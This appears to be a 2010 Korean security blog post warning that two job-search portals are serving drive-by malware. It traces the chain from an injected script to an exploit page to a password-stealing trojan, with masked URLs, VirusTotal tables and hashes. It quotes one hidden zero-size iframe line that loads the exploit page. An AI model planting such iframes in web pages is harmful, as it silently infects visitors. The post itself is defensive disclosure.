세의님의 알라딘 시리즈에 이어서 이에 뒤질세라 평일에 포털사이트인 캐리어도 유포를 시작하였습니다.현재 페이지는 오늘 오후에 변조가 되었음을 확인하였습니다. 그 결과 http://job.XXXX.net 에도 악성링크가 삽입되어서 현재는 취업 사이트인 캐리어와 잡 NEXT에서 유포 되고 있음을 확인 할 수 있습니다 !!
지난주에도 글을 쓸까 말까 하다가 이번에 다시 유포되고 있어서 이렇게 글을 써봅니다. 아무튼 이 사이트 둘은 매우 조심해야 아니 들어가지 말아야합니다 !! 악성코드는 캐리어와 NEXT음에서 유포하고 있습니다. 현재 원인으로써는 먼저 감염된 커리어에 있는거 같습니다. 커리어 http://www.caxxxx.co.kr/js/job_rnd_list.js 에서 job.XXXX.net 으로 유입된거 같습니다.
어쨌든 캐리어는 메인사이트에 들어가는 동시에 JOB NEXT음 은 JOB에 들어가는 동시에 감염이 되는거 같습니다.
[정리]
최초 유포지 : http://www.caxxxx.co.kr/
2차 유포지 : http://job.xxxx.net
악성코드 아이프레임 삽입 : http://xxxx.xxxx.net/xx/jquery.min.js
악성코드 연결 JS : http://2xx.143.48.xxx/xx/si.js
최종파일 연결 : http://2xx.143.48.xxx/xx/si.asp
최종파일 : http://www.sixxx.or.kr/xxot/txxx/down.exe
그중 si.js는 출력에만 접근한다면 쉽게 asp가 나올 수 있습니다.
출력 : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");
[바이러스 토탈]
File name:
si.js
Result:
6/ 43 (14.0%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | JS/Downloader |
| AntiVir | 7.10.12.92 | 2010.09.30 | - |
| Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
| Authentium | 5.2.0.5 | 2010.09.30 | - |
| Avast | 4.8.1351.0 | 2010.09.30 | HTML:IFrame-JK |
| Avast5 | 5.0.594.0 | 2010.09.30 | HTML:IFrame-JK |
| AVG | 9.0.0.851 | 2010.09.30 | - |
| BitDefender | 7.2 | 2010.09.30 | - |
| CAT-QuickHeal | 11.00 | 2010.09.30 | - |
| ClamAV | 0.96.2.0-git | 2010.10.01 | - |
| Comodo | 6248 | 2010.10.01 | - |
| DrWeb | 5.0.2.03300 | 2010.10.01 | - |
| Emsisoft | 5.0.0.50 | 2010.09.30 | - |
| eSafe | 7.0.17.0 | 2010.09.30 | - |
| eTrust-Vet | 36.1.7885 | 2010.09.30 | - |
| F-Prot | 4.6.2.117 | 2010.09.30 | - |
| F-Secure | 9.0.15370.0 | 2010.10.01 | - |
| Fortinet | 4.1.143.0 | 2010.09.30 | - |
| GData | 21 | 2010.10.01 | HTML:IFrame-JK |
| Ikarus | T3.1.1.90.0 | 2010.09.30 | - |
| Jiangmin | 13.0.900 | 2010.09.30 | - |
| K7AntiVirus | 9.63.2648 | 2010.09.30 | - |
| Kaspersky | 7.0.0.125 | 2010.10.01 | - |
| McAfee | 5.400.0.1158 | 2010.10.01 | - |
| McAfee-GW-Edition | 2010.1C | 2010.09.30 | Heuristic.LooksLike.JS.Suspicious.B |
| Microsoft | 1.6201 | 2010.09.30 | - |
| NOD32 | 5493 | 2010.09.30 | - |
| Norman | 6.06.07 | 2010.09.30 | - |
| nProtect | 2010-09-30.01 | 2010.09.30 | - |
| Panda | 10.0.2.7 | 2010.09.30 | - |
| PCTools | 7.0.3.5 | 2010.10.01 | - |
| Prevx | 3.0 | 2010.10.01 | - |
| Rising | 22.67.02.07 | 2010.09.30 | - |
| Sophos | 4.58.0 | 2010.10.01 | Mal/Iframe-Gen |
| Sunbelt | 6952 | 2010.09.30 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
| Symantec | 20101.2.0.161 | 2010.09.30 | - |
| TheHacker | 6.7.0.1.041 | 2010.09.30 | - |
| TrendMicro | 9.120.0.1004 | 2010.09.30 | - |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | - |
| VBA32 | 3.12.14.1 | 2010.09.27 | - |
| ViRobot | 2010.8.31.4017 | 2010.09.30 | - |
| VirusBuster | 12.66.8.0 | 2010.09.30 | - |
| MD5: 82360d68e71cf37ae4400295f1746f08 |
| SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc |
| SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de |
| File size: 424 bytes |
| Scan date: 2010-10-01 00:13:28 (UTC) |
File name:
si.aspResult:
6/ 43 (14.0%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | JS/Cve-2010-0806 |
| AntiVir | 7.10.12.92 | 2010.09.30 | JS/Small.R |
| Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
| Authentium | 5.2.0.5 | 2010.09.30 | - |
| Avast | 4.8.1351.0 | 2010.09.30 | JS:Downloader-RN |
| Avast5 | 5.0.594.0 | 2010.09.30 | JS:Downloader-RN |
| AVG | 9.0.0.851 | 2010.09.30 | - |
| BitDefender | 7.2 | 2010.09.30 | - |
| CAT-QuickHeal | 11.00 | 2010.09.30 | - |
| ClamAV | 0.96.2.0-git | 2010.10.01 | - |
| Comodo | 6248 | 2010.10.01 | - |
| DrWeb | 5.0.2.03300 | 2010.10.01 | - |
| Emsisoft | 5.0.0.50 | 2010.09.30 | - |
| eSafe | 7.0.17.0 | 2010.09.30 | - |
| eTrust-Vet | 36.1.7885 | 2010.09.30 | - |
| F-Prot | 4.6.2.117 | 2010.09.30 | JS/Crypted.GA.gen |
| F-Secure | 9.0.15370.0 | 2010.10.01 | - |
| Fortinet | 4.1.143.0 | 2010.09.30 | - |
| GData | 21 | 2010.10.01 | JS:Downloader-RN |
| Ikarus | T3.1.1.90.0 | 2010.09.30 | - |
| Jiangmin | 13.0.900 | 2010.09.30 | - |
| K7AntiVirus | 9.63.2648 | 2010.09.30 | Riskware |
| Kaspersky | 7.0.0.125 | 2010.10.01 | Exploit.JS.CVE-2010-0806.z |
| McAfee | 5.400.0.1158 | 2010.10.01 | - |
| McAfee-GW-Edition | 2010.1C | 2010.09.30 | Heuristic.BehavesLike.JS.BufferOverflow.A |
| Microsoft | 1.6201 | 2010.09.30 | - |
| NOD32 | 5493 | 2010.09.30 | - |
| Norman | 6.06.07 | 2010.09.30 | - |
| nProtect | 2010-09-30.01 | 2010.09.30 | Script-JS/W32.Agent.AEQ |
| Panda | 10.0.2.7 | 2010.09.30 | - |
| PCTools | 7.0.3.5 | 2010.10.01 | - |
| Prevx | 3.0 | 2010.10.01 | - |
| Rising | 22.67.02.07 | 2010.09.30 | Trojan.DL.Script.JS.Agent.qx |
| Sophos | 4.58.0 | 2010.10.01 | Mal/JSBO-Gen |
| Sunbelt | 6952 | 2010.09.30 | - |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
| Symantec | 20101.2.0.161 | 2010.09.30 | - |
| TheHacker | 6.7.0.1.041 | 2010.09.30 | - |
| TrendMicro | 9.120.0.1004 | 2010.09.30 | - |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | - |
| VBA32 | 3.12.14.1 | 2010.09.27 | - |
| ViRobot | 2010.8.31.4017 | 2010.09.30 | JS.EX-CVE-2010-0806.5882.B |
| VirusBuster | 12.66.8.0 | 2010.09.30 | - |
| MD5: 5d9c846e08a768f648080e5d207aeb47 |
| SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533 |
| SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034 |
| File size: 6015 bytes |
| Scan date: 2010-10-01 00:13:31 (UTC) |
File name:
down.exeResult:
30/ 43 (69.8%)| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | Win-Trojan/Agent.54272.NF |
| AntiVir | 7.10.12.92 | 2010.09.30 | TR/Crypt.ZPACK.Gen |
| Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
| Authentium | 5.2.0.5 | 2010.09.30 | - |
| Avast | 4.8.1351.0 | 2010.09.30 | Win32:Malware-gen |
| Avast5 | 5.0.594.0 | 2010.09.30 | Win32:Malware-gen |
| AVG | 9.0.0.851 | 2010.09.30 | PSW.Generic8.VIP |
| BitDefender | 7.2 | 2010.09.30 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
| CAT-QuickHeal | 11.00 | 2010.09.30 | (Suspicious) - DNAScan |
| ClamAV | 0.96.2.0-git | 2010.10.01 | - |
| Comodo | 6248 | 2010.10.01 | - |
| DrWeb | 5.0.2.03300 | 2010.10.01 | Trojan.PWS.Siggen.8181 |
| Emsisoft | 5.0.0.50 | 2010.09.30 | Trojan.Win32.Pincav!IK |
| eSafe | 7.0.17.0 | 2010.09.30 | - |
| eTrust-Vet | 36.1.7886 | 2010.10.01 | - |
| F-Prot | 4.6.2.117 | 2010.09.30 | - |
| F-Secure | 9.0.15370.0 | 2010.10.01 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
| Fortinet | 4.1.143.0 | 2010.09.30 | - |
| GData | 21 | 2010.10.01 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
| Ikarus | T3.1.1.90.0 | 2010.09.30 | Trojan.Win32.Pincav |
| Jiangmin | 13.0.900 | 2010.09.30 | Trojan/Invader.add |
| K7AntiVirus | 9.63.2648 | 2010.09.30 | Trojan |
| Kaspersky | 7.0.0.125 | 2010.10.01 | Trojan.Win32.Pincav.ahzv |
| McAfee | 5.400.0.1158 | 2010.10.01 | Generic.dx!tzh |
| McAfee-GW-Edition | 2010.1C | 2010.09.30 | Generic.dx!tzh |
| Microsoft | 1.6201 | 2010.09.30 | PWS:Win32/Magania.BQ |
| NOD32 | 5493 | 2010.09.30 | a variant of Win32/PSW.Gamania.NBT |
| Norman | 6.06.07 | 2010.09.30 | - |
| nProtect | 2010-09-30.01 | 2010.09.30 | - |
| Panda | 10.0.2.7 | 2010.09.30 | Generic Trojan |
| PCTools | 7.0.3.5 | 2010.10.01 | Trojan-PSW.Gampass |
| Prevx | 3.0 | 2010.10.01 | High Risk Cloaked Malware |
| Rising | 22.67.02.07 | 2010.09.30 | - |
| Sophos | 4.58.0 | 2010.10.01 | Mal/Dorf-F |
| Sunbelt | 6952 | 2010.09.30 | Trojan.Win32.Generic!BT |
| SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
| Symantec | 20101.2.0.161 | 2010.09.30 | Infostealer.Gampass |
| TheHacker | 6.7.0.1.041 | 2010.09.30 | Trojan/Pincav.ahzv |
| TrendMicro | 9.120.0.1004 | 2010.09.30 | TROJ_PINCAV.SMXA |
| TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | TROJ_PINCAV.SMXA |
| VBA32 | 3.12.14.1 | 2010.09.27 | Malware-Cryptor.Inject.gen |
| ViRobot | 2010.8.31.4017 | 2010.09.30 | - |
| VirusBuster | 12.66.8.0 | 2010.09.30 | Trojan.Pincav.IVM |
| MD5: 18d7b00b5d37587c7456b3c3a1181a69 |
| SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5 |
| SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83 |
| File size: 54272 bytes |
| Scan date: 2010-10-01 00:19:25 (UTC) |
신고업체 : 안철수연구소 이스트 소프트 , 네이버 , 잉카인터넷
[안철수연구소]
1 si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00)
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF(추가 : 2010.10.01.00)
3 si.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.10.01.00)
이전 게시글
[security/보안 뉴스] - [카스퍼스키] 2010년 8월 악성 프로그램 통계
[security/악성코드 유포] - yahoo.js 의 유포날짜 2차 정리 !!
[security/악성코드 유포] - 아스키 코드로 이루어진 악성 아이프레임 !!
'security > 악성코드 유포' 카테고리의 다른 글
| [악성코드 유포] 3차 유포 취업사이트 또 다시 악성코드 삽입 !! (3) | 2010.10.04 |
|---|---|
| 악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ?? (2) | 2010.10.01 |
| yahoo.js 의 유포날짜 2차 정리 !! (0) | 2010.09.26 |
| 아스키 코드로 이루어진 악성 아이프레임 !! (0) | 2010.09.19 |
| RealNetworks RealPlayer ActiveX contorls Vulnerability (2) | 2010.09.10 |
